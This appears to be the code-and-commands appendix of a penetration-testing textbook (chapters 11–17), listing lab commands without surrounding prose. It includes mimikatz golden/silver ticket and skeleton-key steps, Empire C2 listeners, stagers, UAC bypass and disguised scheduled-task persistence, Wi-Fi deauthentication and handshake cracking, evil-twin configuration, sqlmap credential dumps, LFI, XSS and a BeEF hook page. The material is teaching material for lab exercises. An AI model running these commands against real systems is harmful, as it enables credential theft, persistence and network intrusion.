/krbtgt:53456cfa6981cff6455b3f515f04bd46 /id:500
Command 11.24

mimikatz # kerberos::ptt ticket.kirbi

Command 11.25
mimikatz # misc::cmd
Command 11.26

C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.27

mimikatz # lsadump::lsa /patch

Command 11.28

mimikatz # kerberos::golden /user:SilverTicket

/domain:redteamlab.local /sid:S-1-5-21-634716346-
3108032190-2057695417 /rc4:cb7b254f129981ca3ae74d21ef3a9ac4
/id:1234 /target:dc1.redteamlab.local /service:HOST
Command 11.29

mimikatz # kerberos::ptt silver_ticket.kirbi

Command 11.30

mimikatz # misc::cmd
Command 11.31

C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.32
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
Command 11.33

mimikatz # misc::cmd
Command 11.34

C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> powershell
Command 11.35

PS C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> Enter-
PSSession -Computername dc1 -credential
redteamlab\Administrator
Command 11.36

[dc1]: PS C:\Users\Administrator\Documents>
Command 11.37

Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
 LLMNR/NBT-NS Poisoning and SMB Relay –
https://attack.mitre.org/techniques/T1557/001/

 OS Credential Dumping: LSA Secrets –

https://attack.mitre.org/techniques/T1003/004/

 Active Directory Security – https://adsecurity.org/

 Chapter 12
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Empire: https://github.com/BC-SECURITY/Empire

 Starkiller: https://github.com/BC-SECURITY/Starkiller

 Windows Server 2019: https://www.microsoft.com/en-

us/evalcenter/evaluate-windows-server-2019

Images

Figure 12.1 – C2 operations

Figure 12.2 – Empire client-server model

Figure 12.3 – Empire deployment model

Figure 12.4 – Starting the Empire server

 Figure 12.5 – Adding a new Empire server

Figure 12.6 – Connecting to a remote Empire server

Figure 12.7 – Empire client user interface

 Figure 12.8 – Viewing user accounts

Figure 12.9 – Creating a user account

Figure 12.10 – Disabling a user account

 Figure 12.11 – Creating a listener

Figure 12.12 – Viewing listeners

Figure 12.13 – Executing the agent code

Figure 12.14 – Agent creation

 Figure 12.15 – Viewing agents

Figure 12.16 – help menu

Figure 12.17 – Collecting information on the target

Figure 12.18 – Checking the agent context

Figure 12.19 – Executing remote commands

Figure 12.20 – Executing Mimikatz

Figure 12.21 – Credentials table

Figure 12.22 – Viewing running processes

Figure 12.23 – Spawning a new agent

Figure 12.24 – Checking for a new agent

Figure 12.25 – Spawning an interactive shell

Figure 12.26 – Starkiller deployment model

Figure 12.27 – Starkiller log-on page
Figure 12.28 – Accessing the Users menu

Figure 12.29 – User accounts

Figure 12.30 – Changing the password

Figure 12.31 – Creating a new user

Figure 12.32 – Viewing modules

Figure 12.33 – Selecting a listener

Figure 12.34 – Creating a listener
Figure 12.35 – Selecting a stager

Figure 12.36 – Creating a stager

 Figure 12.37 – Copying payload code

Figure 12.38 – Downloading a payload file

Figure 12.39 – Viewing agents

 Figure 12.40 – Executing a module

Figure 12.41 – Viewing real-time module execution

Figure 12.42 – Viewing a list of tasks on the agent
Figure 12.43 – Displaying system information
 Figure 12.44 – Navigating the filesystem

Figure 12.45 – Viewing collected credentials

 Figure 12.46 – Reporting

Code and Commands

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install -y powershell-empire
starkiller
Command 12.1

kali@kali:~$ sudo powershell-empire server

Command 12.2

kali@kali:~$ sudo mousepad /etc/powershell-

empire/client/config.yaml
Command 12.3
 Empire-Server:
host: https://172.30.1.30
port: 1337
socketport: 5000
username: empireadmin
password: password123
Code 12.1

kali@kali:~$ sudo powershell-empire client

Command 12.4

(Empire) > connect -c Empire-Server

Command 12.5

(Empire) > admin

(Empire: admin) > user_list
Command 12.6

(Empire: admin) > create_user NewUser1 Password123

(Empire: admin) > user_list
Command 12.7

(Empire: admin) > disable_user 2

(Empire: admin) > user_list
Command 12.8

kali@kali:~$ sudo powershell-empire server

Command 12.9

kali@kali:~$ sudo powershell-empire client

Command 12.10
(Empire) > uselistener http
Command 12.11

(Empire: uselistener/http) > set Name DClistener

Command 12.12

(Empire: uselistener/http) > set Host 192.168.42.20

Command 12.13

(Empire: uselistener/http) > set Port 1335

Command 12.14

(Empire: uselistener/http) > options

Command 12.15

(Empire: uselistener/http) > execute

Command 12.16

(Empire) > listeners

Command 12.17

(Empire) > usestager multi/launcher

Command 12.18

(Empire: usestager/multi/launcher) > set Listener

DClistener
Command 12.19

(Empire: usestager/multi/launcher) > generate

Command 12.20

(Empire) > agents

Command 12.21
(Empire: agents) > interact 2N534EK6
(Empire: 2N534EK6) > help
Command 12.22

(Empire: 2N534EK6) > info

Command 12.23

(Empire: 2N534EK6) > display high_integrity

high_integrity is 1
Command 12.24

(Empire: 2N534EK6) > bypassuac DClistener

Command 12.25

(Empire: 2N534EK6) > shell ipconfig

Command 12.26

(Empire: 2N534EK6) > mimikatz

Command 12.27

(Empire: 2N534EK6) > credentials

Command 12.28

(Empire: credentials) > interact 2N534EK6

(Empire: 2N534EK6) > shell ps
Command 12.29

(Empire: 2N534EK6) > psinject DClistener 3140

Command 12.30
(Empire: agents) > interact 2N534EK6
(Empire: 2N534EK6) > shell
Command 12.31

(Empire) > uselistener http_malleable

Command 12.32

(Empire: uselistener/http_malleable) > set Profile

office365_calendar.profile
Command 12.33

(Empire: editlistener/http_malleable) > set Host

192.168.40.20
(Empire: uselistener/http_malleable) > set Port 443
Command 12.34

(Empire: uselistener/http_malleable) > set Name

ThreatEmulation
(Empire: uselistener/http_malleable) > execute
Command 12.35

(Empire: uselistener/http_malleable) > main

(Empire) > listeners
Command 12.36

(Empire: listeners) > usestager multi/launcher

(Empire: usestager/multi/launcher) > set Listener
ThreatEmulation
Command 12.37

(Empire: usestager/multi/launcher) > generate

Command 12.38
(Empire: agents) > interact UY2F8P1T
(Empire: UY2F8P1T) > usemodule
powershell/persistence/elevated/schtasks
Command 12.39

(Empire:
usemodule/powershell/persistence/elevated/schtasks) > set
OnLogon True
Command 12.40

(Empire:
usemodule/powershell/persistence/elevated/schtasks) > set
Listener ThreatEmulation
(Empire:
usemodule/powershell/persistence/elevated/schtasks) >
execute
Command 12.41

SUCCESS: The scheduled task "Updater" has successfully been

created.
Schtasks persistence established using listener
ThreatEmulation stored in
HKLM:\Software\Microsoft\Network\debug with Updater OnLogon
trigger.
Command 12.42

kali@kali:~$ sudo powershell-empire server

Command 12.43

kali@kali:~$ sudo starkiller

Command 12.44
Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
 Overview of Empire 4: https://www.bc-security.org/post/overview-of-empire-
4-0-and-c/

 Empire wiki: https://bc-security.gitbook.io/empire-wiki/

 Empire: Malleable C2 Profiles: https://www.bc-security.org/post/empire-

malleable-c2-profiles/
 Chapter 13
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Windows 10 Enterprise: https://www.microsoft.com/en-

us/evalcenter/evaluate-windows-10-enterprise

 FreeRADIUS: https://freeradius.org/

 airgeddon: https://github.com/v1s1t0r1sh3r3/airgeddon

 An Alfa AWUS036NHA High Gain Wireless B/G/N USB adapter

 AN Alfa AWUS036ACH Long-Range Dual-Band AC1200 Wireless USB 3.0 Wi-Fi

adapter

 A physical wireless router that supports WEP, WPA2-Personal, WPA2-Enterprise,

and WPA3 security standards

Images
 Figure 13.1 – Wireless standards

Figure 13.2 – Non-overlapping wireless channels

Figure 13.3 – Frequency comparison table

Figure 13.4 – SISO

Figure 13.5 – MIMO

Figure 13.6 – SU-MIMO

Figure 13.7 – MU-MIMO

Figure 13.8 – Checking for wireless network adapters

Figure 13.9 – Enabling monitoring mode

Figure 13.10 – Verifying monitor mode

 Figure 13.11 – Monitoring wireless networks

Figure 13.12 – Capturing probes from wireless clients

Figure 13.13 – Filtering networks

 Figure 13.14 – Filtering a specific wireless network

Figure 13.15 – Scanning for target wireless networks

Figure 13.16 – De-authentication attack

 Figure 13.17 – Observing associated clients

Figure 13.18 – Wireless router configurations

Figure 13.19 – Checking the wireless network adapter's status

 Figure 13.20 – Enabling monitor mode

Figure 13.21 – Checking the interface's status

Figure 13.22 – Searching for the target network

Figure 13.23 – Capturing the WPA/WPA2 handshake

 Figure 13.24 – Cracking the WPA/WPA2 network

Figure 13.25 – Capturing probes

Figure 13.26 – Checking the wireless adapter's status

 Figure 13.27 – Enabling monitor mode

Figure 13.28 – Hostapd configuration file

Figure 13.29 – Starting the honeypot

Figure 13.30 – Capturing the WPA handshake

Figure 13.31 – aircrack-ng password cracking

Figure 13.32 – Enterprise wireless lab

Figure 13.33 – Checking optional tools

Figure 13.34 – Selecting a wireless network adapter

Figure 13.35 – Enabling monitor mode

Figure 13.36 – Accessing Enterprise attacks menu

Figure 13.37 – Creating custom digital certificates

Figure 13.38 – Certificate options

 Figure 13.39 – Explore for targets

Figure 13.40 – Discovering targets

Figure 13.41 – Selecting a target network

Figure 13.42 – The Enterprise Evil Twin menu

Figure 13.43 – Selecting Deauth aireplay attack

 Figure 13.44 – Launching the attack

Figure 13.45 – User hash captured

Figure 13.46 – Enterprise attacks menu

 Figure 13.47 – Accessing the decryption menu

Figure 13.48 – Accessing the Enterprise decryption menu

Figure 13.49 – Choosing the decryption type

 Figure 13.50 – Interactive options

Figure 13.51 – Password retrieved

Figure 13.52 – Selecting a wireless network adapter

Figure 13.53 – Enabling monitor mode

Figure 13.54 – Accessing Evil Twin attacks menu

Figure 13.55 – Explore for targets

Figure 13.56 – Nearby wireless networks

Figure 13.57 – Choosing a target

Figure 13.58 – Choosing an attack type

Figure 13.59 – Selecting Deauth aireplay attack

Figure 13.60 – Selecting an internet interface

 Figure 13.61 – Honeypot in effect

Figure 13.62 – Checking the wireless network adapter's status

Figure 13.63 – Enabling monitor mode

Figure 13.64 – Checking the interface's status

Figure 13.65 – Discovering the target network

Figure 13.66 – Deauthentication attack

Figure 13.67 – Capturing the WPA handshake

 Figure 13.68 – Password cracking

Figure 13.69 – Researching security vulnerabilities

 Figure 13.70 – Password generator

Code and Comments

kali@kali:~$ sudo airmon-ng check kill
kali@kali:~$ sudo airmon-ng start wlan0
Command 13.1

kali@kali:~$ sudo airodump-ng wlan0mon

Command 13.2

kali@kali:~$ sudo airodump-ng -c 6 wlan0mon

Command 13.3

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi

wlan0mon
Command 13.4

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi

wlan0mon
Command 13.5
kali@kali:~$ sudo aireplay-ng -0 100 -e Corp_Wi-Fi wlan0mon
Command 13.6

kali@kali:~$ sudo airmon-ng check kill

Command 13.7

kali@kali:~$ sudo airmon-ng start wlan0

Command 13.8

kali@kali:~$ sudo airodump-ng wlan0mon

Command 13.9

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi

wlan0mon -w Corp_Wi-Fi
Command 13.10

kali@kali:~$ sudo aireplay-ng -0 100 -a 68:7F:74:01:28:E1

wlan0mon
Command 13.11

kali@kali:~$ aircrack-ng Corp_Wi-Fi-01.cap -w

/usr/share/wordlists/rockyou.txt
Command 13.12

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt install hostapd
Command 13.13

kali@kali:~$ sudo airmon-ng check kill

kali@kali:~$ sudo airmon-ng start wlan1
Command 13.14

kali@kali:~$ mousepad wpa2-attack.conf

Command 13.15
interface=wlan0
driver=nl80211
ssid=Corp_Wi-Fi
wpa=2
wpa_passphrase=fakepassword
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
channel=6
Code 13.1

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi

wlan1mon -w APLessAttack
Command 13.16

kali@kali:~$ sudo hostapd wpa2-attack.conf

Command 13.17

kali@kali:~$ aircrack-ng APLessAttack-01.cap -w

/usr/share/wordlists/rockyou.txt
Command 13.18

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt install airgeddon
Command 13.19

kali@kali:~$ sudo airgeddon

Command 13.20
kali@kali:~$ sudo apt install bettercap
kali@kali:~$ sudo apt install dnsmasq
kali@kali:~$ sudo apt install hostapd-wpe
kali@kali:~$ sudo apt install isc-dhcp-server
kali@kali:~$ sudo apt install asleap
kali@kali:~$ sudo apt install hostapd
kali@kali:~$ sudo apt install mdk4
kali@kali:~$ sudo apt install hcxdumptool
kali@kali:~$ sudo apt install hcxtools
kali@kali:~$ sudo apt install beef-xss
kali@kali:~$ sudo apt install lighttpd
Command 13.21

kali@kali:~$ sudo airgeddon

Command 13.22

/home/kali/enterprise-Corp_Wi-Fi/
Command 13.23

/home/kali/enterprise-Corp_Wi-
Fi/enterprise_captured_john_<BSSID_value>_hashes.txt
Command 13.24

/usr/share/wordlists/rockyou.txt
Command 13.25

kali@kali:~$ sudo airgeddon

Command 13.26
kali@kali:~$ sudo airmon-ng check kill
Command 13.27

kali@kali:~$ sudo airmon-ng start wlan0

Command 13.28

kali@kali:~$ sudo airodump-ng wlan0mon

Command 13.29

kali@kali:~$ sudo airodump-ng -c 8 --essid WPA3_Corp_Wi-Fi

wlan0mon -w WPA3_downgrade
Command 13.30

kali@kali:~$ sudo aireplay-ng -0 100 -a 92:83:C4:0C:5B:88

wlan0mon
Command 13.31

kali@kali:~$ aircrack-ng WPA3_downgrade-01.cap -w

/usr/share/wordlists/rockyou.txt
Command 13.32

Further reading
To learn more about the topics that were covered in this chapter, please go to the
following links:
 Guidelines for Securing Wireless Local Area Networks (WLANs):
https://csrc.nist.gov/publications/detail/sp/800-153/final

 Key Reinstallation Attacks: https://www.krackattacks.com/

 Chapter 14
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following software requirement:
 Kali Linux 2021.2 – https://www.kali.org/get-kali/

Images

Figure 14.1 – SET menu

Figure 14.2 – Accessing the Website Attacks menu

Figure 14.3 – Accessing the Credential Harvester Attack Method menu

Figure 14.4 – Using Site Cloner

Figure 14.5 – Setting up the attack

Figure 14.6 – Displaying the phishing website

Figure 14.7 – Capturing user credentials

 Figure 14.8 – Redirection to the legitimate website

Figure 14.9 – Accessing the Infectious Media Generator menu

Figure 14.10 – Selecting an executable type

Figure 14.11 – Configuring the payload

Figure 14.12 – Reverse shell

Figure 14.13 – Viewing active shells

 Figure 14.14 – Interacting with a shell

Code and Commands

kali@kali:~$ sudo setoolkit
Command 14.1

Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
 Social Engineering – https://www.imperva.com/learn/application-
security/social-engineering-attack/

 Avoiding Social Engineering and Phishing Attacks – https://us-

cert.cisa.gov/ncas/tips/ST04-014
 Chapter 15
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2 – https://www.kali.org/get-kali/

 Burp Suite – https://portswigger.net/burp

 OWASP Juice Shop – https://owasp.org/www-project-juice-shop/

Images

Figure 15.1 – Web application

Figure 15.2 – HTTP header

 Figure 15.3 – HTTP response header

Figure 15.4 – Burp Suite intercepting request messages

Figure 15.5 – FoxyProxy

 Figure 15.6 – Installing FoxyProxy

Figure 15.7 – Accessing the menu of FoxyProxy

Figure 15.8 – Configuring a proxy

Figure 15.9 – Switching proxies

 Figure 15.10 – Opening Burp Suite

Figure 15.11 – Configuring the Intercept Client Requests options

Figure 15.12 – Configuring the Intercept Server Responses options

Figure 15.13 – Proxy Intercept tab

Figure 15.14 – Defining the scope

 Figure 15.15 – Filter options

Figure 15.16 – Passive crawling

Figure 15.17 – Capturing a web request

Figure 15.18 – Sending to Repeater

Figure 15.19 – Working with Repeater

Figure 15.20 – Score Board

Figure 15.21 – Web server deployment

Figure 15.22 – Filtering challenges

Figure 15.23 – Capturing the HTTP POST message

Figure 15.24 – Forwarding the HTTP POST message

 Figure 15.25 – Creating a SQL error

Figure 15.26 – Checking for SQL errors

 Figure 15.27 – SQL injection

Figure 15.28 – Intercepting the HTTP POST message

Figure 15.29 – Response from the web application
 Figure 15.30 – Gaining access

Figure 15.31 – Capturing a request message

Figure 15.32 – Modifying headers

Figure 15.33 – HTTP status update

 Figure 15.34 – Administration section

Figure 15.35 – Discovering hidden directories

Figure 15.36 – Checking the sensitive directory

Figure 15.37 – Accessing confidential files

Figure 15.38 – Looking for sensitive files

Figure 15.39 – Viewing data

Figure 15.40 – Decoding Base64

 Figure 15.41 – ROT13 decryption

Figure 15.42 – Completing the challenge

 Figure 15.43 – Capturing an HTTP request

Figure 15.44 – Modifying an HTTP request message

 Figure 15.45 – Abusing security misconfigurations

Code and Commands

kali@kali:~$ sudo docker run --rm -p 3000:3000
bkimminich/juice-shop
Command 15.1

GET /administration/ HTTP/1.1

Code 15.1

kali@kali:~$ dirb http://localhost:3000

/usr/share/wordlists/dirb/big.txt -r -N 403
Command 15.2
http://localhost:3000/ftp/eastere.gg%2500.md
Code 15.2

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt install hurl
kali@kali:~$ hURL --help
Command 15.3

kali@kali:~$ hURL -8
"/gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/jvguva/gur/r
nfgre/rtt"
Command 15.4

http://localhost:3000/the/devs/are/so/funny/they/hid/an/eas
ter/egg/within/the/easter/egg
Code 15.3

GET /rest/fakepath HTTP/1.1

Code 15.4

Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
 OWASP Top 10 – https://owasp.org/www-project-top-ten/

 OWASP Top 10 as a standard –

https://owasp.org/Top10/A00_2021_How_to_use_the_OWASP_Top_10_
as_a_standard/

 AppSec Program with the OWASP Top 10 –

https://owasp.org/Top10/A00_2021-
How_to_start_an_AppSec_program_with_the_OWASP_Top_10/
 Chapter 16
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Windows 10 Enterprise: https://www.microsoft.com/en-

us/evalcenter/evaluate-windows-10-enterprise

 Burp Suite: https://portswigger.net/burp

 OWASP Broken Web Applications:

https://sourceforge.net/projects/owaspbwa/files/

 OWASP Juice Shop: https://owasp.org/www-project-juice-shop/

Images

Figure 16.1 – Insecure directory

Figure 16.2 – Error opening the file

Figure 16.3 – Viewing the packages

Figure 16.4 – Researching the epilogue-js package

Figure 16.5 – Submitting feedback

Figure 16.6 – Resetting password
Figure 16.7 – Revealing the security question
Figure 16.8 – Sending traffic
 Figure 16.9 – HTTP POST message

Figure 16.10 – Inserting a new position

 Figure 16.11 – Setting the payload

Figure 16.12 – Identifying the correct name

 Figure 16.13 – OWASP BWA banner

Figure 16.14 – OWASP BWA home page

 Figure 16.15 – Selecting a bug

Figure 16.16 – Generating HTTP traffic

Figure 16.17 – HTTP GET message

 Figure 16.18 – Modifying the HTTP request

Figure 16.19 – Bypassing the security controls

 Figure 16.20 – OWASP BWA banner

Figure 16.21 – OWASP BWA home page

Figure 16.22 – Selecting a vulnerable application

Figure 16.23 – Selecting a vulnerability type

Figure 16.24 – Checking for SQL injection

Figure 16.25 – HTTP GET request

Figure 16.26 – Detecting vulnerabilities

Figure 16.27 – Discovering databases

Figure 16.28 – Retrieving tables

 Figure 16.29 – Columns of the users table

Figure 16.30 – Columns retrieved from a table

Figure 16.31 – Retrieving columns only

Figure 16.32 – Password cracking process

Figure 16.33 – Extracted data

Figure 16.34 – An XSS attack

 Figure 16.35 – CSRF attack

Figure 16.36 – OWASP BWA banner

Figure 16.37 – OWASP BWA home page

Figure 16.38 – Selecting a bug

Figure 16.39 – Generating a HTTP request

Figure 16.40 – Testing reflected XSS

Figure 16.41 – Reflected XSS working

Figure 16.42 – Selecting a bug

Figure 16.43 – Storing data on a web application

Figure 16.44 – Performing stored XSS

Figure 16.45 – Invisible entry

Figure 16.46 – Opening BeEF

 Figure 16.47 – BeEF service

Figure 16.48 – BeEF login page

 Figure 16.49 – Custom web page

Figure 16.50 – Loading the malicious web page

 Figure 16.51 – Hooked web browser

Figure 16.52 – Sending a social engineering attack

 Figure 16.53 – Pop-up window on the victim's browser

Code and Commands

GET /bWAPP/rlfi.php?language=file:///etc/passwd&action=go
HTTP/1.1
Code 16.1

sudo sqlmap --url <URL> --cookie= <'cookie token'> -dbs

Command 16.1
kali@kali:~$ sudo sqlmap --url
http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=
Submit# --cookie='security=low;
PHPSESSID=ii9iqv2f0fgd7g057hkounq103' -dbs
Command 16.2

kali@kali:~$ sudo sqlmap --url

http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=
Submit# --cookie='security=low;
PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --tables –D dvwa
Command 16.3

kali@kali:~$ sudo sqlmap --url

http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=
Submit# --cookie='security=low;
PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --columns -D dvwa
Command 16.4

kali@kali:~$ sudo sqlmap --url

http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=
Submit# --cookie='security=low;
PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --columns -D dvwa -T
users
Command 16.5

kali@kali:~$ sudo sqlmap --url

http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=
Submit# --cookie='security=low;
PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --dump -D dvwa -T
users
Command 16.6

<script>alert("Testing Reflected XSS")

Code 16.2
</script>
Command 16.7

<script>alert("Testing Stored XSS")</script>

Code 16.3

kali@kali:~$ service apache2 start

Command 16.8

kali@kali:~$ sudo mousepad /var/www/html/index.html

Command 16.9

<html>
<head>
<title>Web Page</title>
<script src="http://<IP>:3000/hook.js"></script>
</head>
<body>
<h1>This is a vulnerable web page</h1>
<p>We are using browser exploitation.</p>
</body>
</html>
Code 16.4

Further reading
To learn more about the topics that were covered in this chapter, please go to the
following links:
 OWASP Top 10: https://owasp.org/www-project-top-ten/
 OWASP Top 10 as a standard:
https://owasp.org/Top10/A00_2021_How_to_use_the_OWASP_Top_10_
as_a_standard/

 AppSec Program with the OWASP Top 10:

https://owasp.org/Top10/A00_2021-
How_to_start_an_AppSec_program_with_the_OWASP_Top_10/
 Chapter 17
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

Images

Figure 17.1 – WiFi Pineapple Nano

Figure 17.2 – ESP8266 microcontroller

Figure 17.3 – Bash Bunny

Figure 17.4 – Packet Squirrel

 Figure 17.5 – LAN Turtle

Figure 17.6 – USB-powered network switch

 Figure 17.7 – Retractable cable

Figure 17.8 – ZeroTier network connectivity

Figure 17.9 – Creating a network

Figure 17.10 – Joining a network

Figure 17.11 – Member

 Figure 17.12 – Allowing a member

Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
 Rules of engagement: https://hub.packtpub.com/penetration-testing-rules-
of-engagement/

 Penetration testing methodologies:

https://wiki.owasp.org/index.php/Penetration_testing_methodologies

 OWASP Testing Checklist: https://github.com/tanprathan/OWASP-Testing-

Checklist

 CyberChef: https://gchq.github.io/CyberChef/

 PayloadsAllTheThings:
https://github.com/swisskyrepo/PayloadsAllTheThings